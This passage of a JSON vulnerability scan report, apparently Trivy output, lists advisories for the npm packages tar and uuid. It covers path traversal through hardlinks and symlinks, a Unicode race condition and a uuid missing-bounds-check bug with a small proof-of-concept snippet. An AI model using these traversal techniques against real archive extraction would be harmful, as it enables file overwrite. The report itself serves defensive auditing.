"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "V3Score": 8.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-24842", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46", "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v", "https://nvd.nist.gov/vuln/detail/CVE-2026-24842", "https://www.cve.org/CVERecord?id=CVE-2026-24842" ], "PublishedDate": "2026-01-28T01:16:14.947Z", "LastModifiedDate": "2026-02-02T14:30:10.89Z" }, { "VulnerabilityID": "CVE-2026-26960", "VendorIDs": [ "GHSA-83g3-92jg-28cx" ], "PkgID": "tar@6.2.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "769cdab53da6940b" }, "InstalledVersion": "6.2.1", "FixedVersion": "7.5.8", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26960", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e12f4efde71cbbbd1999469aab05a7c998047f064c44d0ad68b6c566c87fc220", "Title": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation", "Description": "node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.", "Severity": "HIGH", "CweIDs": [ "CWE-22" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "V3Score": 7.1 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "V3Score": 7.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "V3Score": 7.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-26960", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384", "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f", "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx", "https://nvd.nist.gov/vuln/detail/CVE-2026-26960", "https://www.cve.org/CVERecord?id=CVE-2026-26960" ], "PublishedDate": "2026-02-20T02:16:53.883Z", "LastModifiedDate": "2026-02-20T19:24:16.537Z" }, { "VulnerabilityID": "CVE-2026-29786", "VendorIDs": [ "GHSA-qffp-2rhf-9h96" ], "PkgID": "tar@6.2.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "769cdab53da6940b" }, "InstalledVersion": "6.2.1", "FixedVersion": "7.5.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29786", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0511ed58ab29fce26548c8335f4ee276509daa7e1f25d23e1f94f92769b92242", "Title": "node-tar: hardlink path traversal via drive-relative linkpath", "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.", "Severity": "HIGH", "CweIDs": [ "CWE-22", "CWE-59" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L", "V40Score": 8.2 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", "V3Score": 6.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", "V3Score": 8.6 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-29786", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f", "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96", "https://nvd.nist.gov/vuln/detail/CVE-2026-29786", "https://www.cve.org/CVERecord?id=CVE-2026-29786" ], "PublishedDate": "2026-03-07T16:15:55.587Z", "LastModifiedDate": "2026-03-11T21:50:01.91Z" }, { "VulnerabilityID": "CVE-2026-31802", "VendorIDs": [ "GHSA-9ppj-qmqm-q256" ], "PkgID": "tar@6.2.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "769cdab53da6940b" }, "InstalledVersion": "6.2.1", "FixedVersion": "7.5.11", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-31802", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:149a86bd0d45e0af151de9dee2bfd37d877ed471b37c8ddd23c295f15fb334bf", "Title": "tar: tar: File overwrite via drive-relative symlink traversal", "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.", "Severity": "HIGH", "CweIDs": [ "CWE-22" ], "VendorSeverity": { "ghsa": 3, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N", "V40Score": 8.2 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "V3Score": 5.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 6.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-31802", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad", "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256", "https://nvd.nist.gov/vuln/detail/CVE-2026-31802", "https://www.cve.org/CVERecord?id=CVE-2026-31802" ], "PublishedDate": "2026-03-10T07:44:58.02Z", "LastModifiedDate": "2026-03-18T18:13:34.703Z" }, { "VulnerabilityID": "CVE-2026-23745", "VendorIDs": [ "GHSA-8qq5-rm4j-mr97" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "a31b88ca9e9fafdc" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23745", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:91f1242953a088524936ce5cd1ed76e7c0c454441795633d40dd5a50e92b4a6f", "Title": "node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives", "Description": "node-tar is a Tar for Node.js. The node-tar library (\u003c= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.", "Severity": "HIGH", "CweIDs": [ "CWE-22" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N", "V40Score": 8.2 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "V3Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "V3Score": 8.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-23745", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", "https://nvd.nist.gov/vuln/detail/CVE-2026-23745", "https://www.cve.org/CVERecord?id=CVE-2026-23745" ], "PublishedDate": "2026-01-16T22:16:26.83Z", "LastModifiedDate": "2026-02-18T16:20:07.823Z" }, { "VulnerabilityID": "CVE-2026-23950", "VendorIDs": [ "GHSA-r6q2-hw4h-h46w" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "a31b88ca9e9fafdc" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23950", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:486fcef24360966a2db3dac7580aa7a6898d16cb62fb2db88b1ce7faef683213", "Title": "node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition", "Description": "node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.", "Severity": "HIGH", "CweIDs": [ "CWE-176", "CWE-352", "CWE-367" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", "V3Score": 8.8 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 5.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", "V3Score": 8.8 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-23950", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6", "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w", "https://nvd.nist.gov/vuln/detail/CVE-2026-23950", "https://www.cve.org/CVERecord?id=CVE-2026-23950" ], "PublishedDate": "2026-01-20T01:15:57.87Z", "LastModifiedDate": "2026-02-18T15:50:29.91Z" }, { "VulnerabilityID": "CVE-2026-24842", "VendorIDs": [ "GHSA-34x7-hfp2-rc4v" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "a31b88ca9e9fafdc" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24842", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:3821767ead7d2b75b45213a27ae5881d9d6235928be792f12b3e805f792318f3", "Title": "node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check", "Description": "node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-22", "CWE-59" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "V3Score": 8.2 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "V3Score": 8.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-24842", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46", "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v", "https://nvd.nist.gov/vuln/detail/CVE-2026-24842", "https://www.cve.org/CVERecord?id=CVE-2026-24842" ], "PublishedDate": "2026-01-28T01:16:14.947Z", "LastModifiedDate": "2026-02-02T14:30:10.89Z" }, { "VulnerabilityID": "CVE-2026-26960", "VendorIDs": [ "GHSA-83g3-92jg-28cx" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "a31b88ca9e9fafdc" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.8", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26960", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:2100b5ba0d977cbbf973bf6ff5bfcda6e8d40ef2a8e69fb1541d988fa5285b2d", "Title": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation", "Description": "node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.", "Severity": "HIGH", "CweIDs": [ "CWE-22" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "V3Score": 7.1 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "V3Score": 7.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "V3Score": 7.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-26960", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384", "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f", "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx", "https://nvd.nist.gov/vuln/detail/CVE-2026-26960", "https://www.cve.org/CVERecord?id=CVE-2026-26960" ], "PublishedDate": "2026-02-20T02:16:53.883Z", "LastModifiedDate": "2026-02-20T19:24:16.537Z" }, { "VulnerabilityID": "CVE-2026-29786", "VendorIDs": [ "GHSA-qffp-2rhf-9h96" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "a31b88ca9e9fafdc" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29786", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:56f9ebe65eab2a87dcc71bace2bd9a5ea6a5282cb03db5277275782af7f5edba", "Title": "node-tar: hardlink path traversal via drive-relative linkpath", "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.", "Severity": "HIGH", "CweIDs": [ "CWE-22", "CWE-59" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L", "V40Score": 8.2 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", "V3Score": 6.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", "V3Score": 8.6 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-29786", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f", "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96", "https://nvd.nist.gov/vuln/detail/CVE-2026-29786", "https://www.cve.org/CVERecord?id=CVE-2026-29786" ], "PublishedDate": "2026-03-07T16:15:55.587Z", "LastModifiedDate": "2026-03-11T21:50:01.91Z" }, { "VulnerabilityID": "CVE-2026-31802", "VendorIDs": [ "GHSA-9ppj-qmqm-q256" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "a31b88ca9e9fafdc" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.11", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-31802", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:4a0e3e859f42776d29fe81073a391e617737405be6fb4dc8020cd06df3801f81", "Title": "tar: tar: File overwrite via drive-relative symlink traversal", "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.", "Severity": "HIGH", "CweIDs": [ "CWE-22" ], "VendorSeverity": { "ghsa": 3, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N", "V40Score": 8.2 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "V3Score": 5.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 6.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-31802", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad", "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256", "https://nvd.nist.gov/vuln/detail/CVE-2026-31802", "https://www.cve.org/CVERecord?id=CVE-2026-31802" ], "PublishedDate": "2026-03-10T07:44:58.02Z", "LastModifiedDate": "2026-03-18T18:13:34.703Z" }, { "VulnerabilityID": "CVE-2025-64118", "VendorIDs": [ "GHSA-29xp-372q-xqph" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "a31b88ca9e9fafdc" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64118", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:f41538c7d2582b7c66b5e33451264bf0723862844949f6610b93db07601f83e2", "Title": "node-tar: tar: node-tar: Information disclosure via reading a truncated tar file", "Description": "node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.", "Severity": "MEDIUM", "CweIDs": [ "CWE-362", "CWE-367" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H", "V40Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "V3Score": 4.7 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-64118", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d", "https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9", "https://github.com/isaacs/node-tar/issues/445", "https://github.com/isaacs/node-tar/pull/446", "https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph", "https://nvd.nist.gov/vuln/detail/CVE-2025-64118", "https://www.cve.org/CVERecord?id=CVE-2025-64118" ], "PublishedDate": "2025-10-30T18:15:33.673Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, { "VulnerabilityID": "GHSA-w5hq-g745-h8pq", "PkgID": "uuid@3.4.0", "PkgName": "uuid", "PkgIdentifier": { "PURL": "pkg:npm/uuid@3.4.0", "UID": "7d9619cf1e452e6a" }, "InstalledVersion": "3.4.0", "FixedVersion": "14.0.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-w5hq-g745-h8pq", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:969a882abdcc7191be1f9fbcde7343201b1876bd8779029bc10ddf53a52b750f", "Title": "uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided", "Description": "### Summary\n\n`v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`). \nBy contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds.\n\nThis inconsistency allows **silent partial writes** into caller-provided buffers.\n\n\n### Affected code\n\n- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation.\n- `src/v6.ts` writes `buf[offset + i]` without bounds validation.\n\n### Reproducible PoC\n\n```bash\ncd /home/StrawHat/uuid\nnpm ci\nnpm run build\n\nnode --input-type=module -e \"\nimport {v4,v5,v6} from './dist-node/index.js';\nconst ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';\nfor (const [name,fn] of [\n ['v4',()=\u003ev4({},new Uint8Array(8),4)],\n ['v5',()=\u003ev5('x',ns,new Uint8Array(8),4)],\n ['v6',()=\u003ev6({},new Uint8Array(8),4)],\n]) {\n try { fn(); console.log(name,'NO_THROW'); }\n catch(e){ console.log(name,'THREW',e.name); }\n}\"\n```\n\nObserved:\n\n- `v4 THREW RangeError`\n- `v5 NO_THROW`\n- `v6 NO_THROW`\n\nExample partial overwrite evidence captured during audit:\n\n```text\nsame true buf [\n 170, 170, 170, 170,\n 75, 224, 100, 63\n]\nv6 [\n 187, 187, 187, 187,\n 31, 19, 185, 64\n]\n```\n\n### Security impact\n\n- **Primary**: integrity/robustness issue (silent partial output).\n- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.\n- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.\n\n### Suggested fix\n\nAdd the same guard used by `v4`/`v1`/`v7`:\n\n```ts\nif (offset \u003c 0 || offset + 16 \u003e buf.length) {\n throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);\n}\n```\n\nApply to:\n\n- `src/v35.ts` (covers `v3` and `v5`)\n- `src/v6.ts`", "Severity": "MEDIUM", "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", "V40Score": 6.3 } }, "References": [ "https://github.com/uuidjs/uuid", "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", "https://github.com/uuidjs/uuid/releases/tag/v14.0.0", "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq" ], "PublishedDate": "2026-04-22T20:53:24Z", "LastModifiedDate": "2026-04-22T20:53:24Z" }, { "VulnerabilityID": "GHSA-w5hq-g745-h8pq", "PkgID": "uuid@7.0.3", "PkgName": "uuid", "PkgIdentifier": { "PURL": "pkg:npm/uuid@7.0.3", "UID": "4c942b206312fdd9" }, "InstalledVersion": "7.0.3", "FixedVersion": "14.0.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-w5hq-g745-h8pq", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:a857bbe275cc5c71c0296d09be55e665868f3ee49f1bc33e0bb472b3108323a9", "Title": "uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided", "Description": "### Summary\n\n`v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`). \nBy contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds.\n\nThis inconsistency allows **silent partial writes** into caller-provided buffers.\n\n\n### Affected code\n\n- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation.\n- `src/v6.ts` writes `buf[offset + i]` without bounds validation.\n\n### Reproducible PoC\n\n```bash\ncd /home/StrawHat/uuid\nnpm ci\nnpm run build\n\nnode --input-type=module -e \"\nimport {v4,v5,v6} from './dist-node/index.js';\nconst ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';\nfor (const [name,fn] of [\n ['v4',()=\u003ev4({},new Uint8Array(8),4)],\n ['v5',()=\u003ev5('x',ns,new Uint8Array(8),4)],\n ['v6',()=\u003ev6({},new Uint8Array(8),4)],\n]) {\n try { fn(); console.log(name,'NO_THROW'); }\n catch(e){ console.log(name,'THREW',e.name); }\n}\"\n```\n\nObserved:\n\n- `v4 THREW RangeError`\n- `v5 NO_THROW`\n- `v6 NO_THROW`\n\nExample partial overwrite evidence captured during audit:\n\n```text\nsame true buf [\n 170, 170, 170, 170,\n 75, 224, 100, 63\n]\nv6 [\n 187, 187, 187, 187,\n 31, 19, 185, 64\n]\n```\n\n### Security impact\n\n- **Primary**: integrity/robustness issue (silent partial output).\n- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.\n- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.\n\n### Suggested fix\n\nAdd the same guard used by `v4`/`v1`/`v7`:\n\n```ts\nif (offset \u003c 0 || offset + 16 \u003e buf.length) {\n throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);\n}\n```\n\nApply to:\n\n- `src/v35.ts` (covers `v3` and `v5`)\n- `src/v6.ts`", "Severity": "MEDIUM", "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", "V40Score": 6.3 } }, "References": [ "https://github.com/uuidjs/uuid", "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", 